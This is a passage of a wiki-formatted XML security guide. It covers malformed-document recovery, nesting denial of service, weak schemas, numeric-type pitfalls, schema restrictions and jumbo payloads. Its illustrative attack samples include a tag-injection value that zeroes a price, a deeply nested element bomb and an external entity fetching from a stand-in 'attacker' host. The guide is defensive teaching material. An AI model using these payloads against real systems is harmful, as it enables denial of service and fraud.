The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
